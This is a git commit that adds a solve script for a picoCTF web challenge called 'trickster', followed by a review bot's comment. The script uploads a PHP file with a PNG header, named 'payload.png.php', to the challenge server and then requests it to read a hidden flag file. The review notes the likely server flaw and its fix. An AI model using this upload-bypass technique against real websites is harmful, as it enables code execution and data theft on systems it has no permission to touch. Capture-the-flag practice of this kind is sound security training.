web/trickster

Oystein Kristoffer Tveit 2024-09-05 19:54:46 +02:00
parent 147cc5ec57
commit 20a447923a
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
1 changed files with 31 additions and 0 deletions

31
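--- a/web/trickster/solve.py
+++ b/web/trickster/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.requests
+import requests
+BASE_URL = "http://atlas.picoctf.net:65066"
+def main():
+PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])
+payload = PNG_HEADER + b'''
+<?php
+echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))
+?>
+'''
+requests.post(
+BASE_URL + "/",
+files = {
+'file': ('payload.png.php', payload),
+'submit': 'Upload File',
+}
+)
+# Found through /robots.txt
+res = requests.get(BASE_URL + "/uploads/payload.png.php")
+print(res)
+print(res.text)
+if __name__ == '__main__':
+main()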
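Review bot: The response from `requests.post(...)` in `main()` is discarded, so a rejected upload only surfaces later as an unexplained error status from the `/uploads/` GET. Keep the response and call `raise_for_status()` on it, and pass `timeout=` to both calls so the script cannot hang on a dead challenge instance. The `'submit': 'Upload File'` entry sits in `files=`, which as far as I can tell makes requests send it as a file part with a filename rather than as an ordinary form field; `data={'submit': 'Upload File'}` states the intent. For readers of the write-up, a comment above `payload` would record what is being exercised and how it is fixed, e.g. `# server appears to accept uploads on PNG magic bytes and a ".png" in the name, and serves /uploads/ with PHP enabled; the fix is a strict extension allowlist and a non-executable upload directory`. That description of the server is inferred from the script, not shown in the commit.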